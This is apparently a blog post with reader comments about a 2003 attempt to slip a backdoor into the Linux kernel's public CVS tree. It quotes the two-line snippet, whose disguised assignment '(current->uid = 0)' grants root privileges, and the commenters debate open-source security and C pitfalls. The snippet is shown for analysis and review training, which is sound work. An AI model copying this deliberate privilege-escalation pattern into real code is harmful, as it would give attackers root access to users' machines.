Kerneltrap.org reports that somebody tried last week to sneak a snippet of malicious code into the Linux kernel’s source code, to create a backdoor that could be exploited later to seize control of Linux machines. Fortunately, members of the software development team spotted the problem the next day and removed the offending code.
The malicious code snippet was small but it was constructed cleverly, so that most programmers would miss the problem on casual reading of the code.
This incident illuminates an interesting debate on the security tradeoffs between open-source and proprietary code. Opponents of open-source argue that the open development process makes it easier for a badguy to inject malicious code. Fans of open-source argue that open code makes it easier for the good guys to spot problems. Both groups can find some support in this story, in which an unknown person did inject malicious code, and open-source devleopers did read the code and spot the problem.
What we don’t know is how often this sort of thing happens in proprietary software development. There must be some attempts to insert malicious code, given the amount of money at stake and the sheer number of people who have the opportunity to try inserting a backdoor. But we don’t know how many people try, or how quickly they are caught.
[Technogeek readers: The offending code is below. Can you spot the problem?
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;
]
Abstractions & Language design
Having C derivatives used in kernels is OK to a degree, but hasn’t the time come to treat such C level type code like assembly is currently? In most applications/user level space programs, the argument should be a little more persuasive to those concerned about computer security.
The problem is the entrenchment of old ideas in the most popular computer languages. Even CPU and hardware architectures are influenced the amount of legacy code and the methods to optimize it.
I’m not a proponent of Java in all cases; its profile can be limiting. But during the 90’s, higher education computer science programs latched onto it a big way. Since a good education should provide exposure to alternative approaches, including ones not commercially in vogue, to what degree have Eiffel, Ocaml, and Haskell been taught? While these languages won’t be immune to certain types of security problems, they do eliminate a fairly large class of them.
Having worked with C and C++ for many years of my professional career, I don’t think that the average programmer is responsible enough to prevent pointer problems, double delete, buffer overruns, non-initialized data, and silly typos, which result in legal programs with radically different semantics. Even with code reviews, testing, and other software engineering mechanisms some of these mistakes still get through.
While Addison Wesley and the C++ gurus are happy to add to Napoleonic codifying of how to program “properly” in this language, it’s very possibly forget to apply their advice in an instance or two. Not too mention the bulk of software developers won’t be interested in becoming the next Herb Sutter or reading all the “gotchas”. Considering these gurus had to almost delay the standardization of the C++ standard library to make it exception-safe is a good example of smarties outsmarting themselves. It only took them 10 years to get the recent incarnations standardized. The standard is still incomplete; there are no smart pointers to place in STL containers (auto_ptr won’t do). I shouldn’t need a BOOST to do the basics.
Computer Science and its pragmatic execution in industry need to advance the art. C# and Java are only a start and are far from perfect.
At times, Herb Sutter and the C++ crowd complement a systems programming perspective. C++ exception-safety, the invalidation of objects in EJB when an EJB exception is thrown, and Eiffel’s departure on how to handle exceptions from the preponderance of modern languages are interesting ways to look at a reoccurring fundamental issue. An object’s methods should allow the transition from one valid set of member variable values to another valid set. What happens when an exception is thrown? Most languages, frameworks, containers, etc., do not perform a rollback automatically for you. What does this paragraph’s discussion have to do with computer security? These types of issues directly impact the consistency and reliability of programs. For computer languages the number of meta-issues and meta-idioms should be reduced to program correctly, otherwise complexity will limit the overall utility.
The challenge is balancing the different dimensions of software. It should be possible to make progress in certain directions without making significant sacrifices. Smaller penalties in other dimensions, should allow for greater adoption.
Some comments here:
1. The hack only made it to the public CVS repository, not to the real kernel trees (the most important of which is Linus’s own Bitkeeper tree)
2. The tool that picked up the error was the one that Larry McVoy uses to generate the public CVS tree from BitMover’s Linux tree (the public CVS tree had been modified directly, so the export tool objected).
3. It was only in the subsequent discussion on LKML that it was realised that this was an attempt at inserting a back door.
So what does that mean in terms of the security of open source? It means open source doesn’t magically remove the need for reviews and audits of code going into the tree via legitimate means. It doesn’t magically remove the need to protect your source trees from external hackers inserting code via illegitimate means (e.g. you should at least do what McVoy did and verify public copies against private ones).
What open source _does_ mean, is that every attempt to insert a Trojan is open to external review – and those who are paranoid about security are free to compile their own kernel from source code they trust (assuming they have access to a C compiler they already trust).
Now, how sure are you that a disgruntled employee hasn’t slipped a backdoor trick like this somewhere into the millions of lines of proprietary code that is used every day? Look at how many security bugs get through proprietary QA as it is – what about a deliberately introduced and obfuscated flaw like the one hacked into the Linux public CVS?
Trent, you are correct on both points. C interprets the the assignemnt expression’s value to be the same as the value assigned. This is true for any conditional branching, from “if” to “while” and “for”. In other words the expression “x=5” evaluates to “5” (which is non zero and therefore “true”) in addition to the “side effect” of assigning the value “5” to the variable “x”.
This idiom is somewhat common in C, though heavily discouraged in C++. (Many developers, myself included, consider it to be far more risk than it’s worth.)
For more details on this incident:
http://kerneltrap.org/node/view/1584
While it did create a security hole, the concept itself of assigning a value to a variable and then testing to see if that value is non-zero has some definate uses. I use that technique in PHP code I write, I use an assignment statement inside a while loop test to both load in the data one row at a time from an sql query and check to see if I have loaded the last row. Example.
while ($row=mysql_fetch_array[result]) {
// code to handle data in $row
}
Now I could be wrong cause its been a long time since I programmed any in C, but you could do the same thing in C. I believe that it treats the value that was assigned as though it was the result of a comparison for use in the while statement.
Perhaps gcc should be tweaked to make more noise about non-expression expressions. This sort of ridiculous obfuscated goo should not be allowed in security-critical code. It’s certainly not necessary.
Isn’t it the case that the code was injected by a cracker who broke into the source code repositry and pasted in the malicious code? So the open source process helped out the malefactor by enabling them to examine the code and find the place to insert the hack, but the remainder of the hack could have been executed just as easily on a proprietary software package, right?
Unfortunately, the open-source side loses on both counts in this case. The change was detected by a proprietary tool.
Yup, Trent’s right. I tested something similar. It passed just fine using
“gcc -Wall -pendantic -O”
Brrr … quite an evil little thing, and very easy for a reviewer to miss, as easy as missing a typo.
Ah, but it wouldn’t give you a warning because its encapsulated in an extra set of ()’s. Actually it is a rather elegant hack. It is just a good thing that A) it was caught in the CVS tree and thus didn’t end up in copies that would have been derived from the CVS. From what I have read it was unlikely that it would have managed to propogate up to the Bit Keeper Tree’s. Of course this still means that some work needs to be done to ascertain how it managed to get into the CVS tree.
Interestingly enough, this type of thing would be caught (or at least brought to somebody’s attention) by automated checking programs – such as LINT or a good compiler set to maximum warnings. Any experienced code reviewer would also pay extra attention to statement like this.
Putting the condition “(current->uid = 0)” in an _if_ statement makes it look like a classic C coding error – under normal circumstances you would expect “(current->uid == 0)” instead. Having your hacked code generate a [conceptual] warning is not the best way to keep it secret.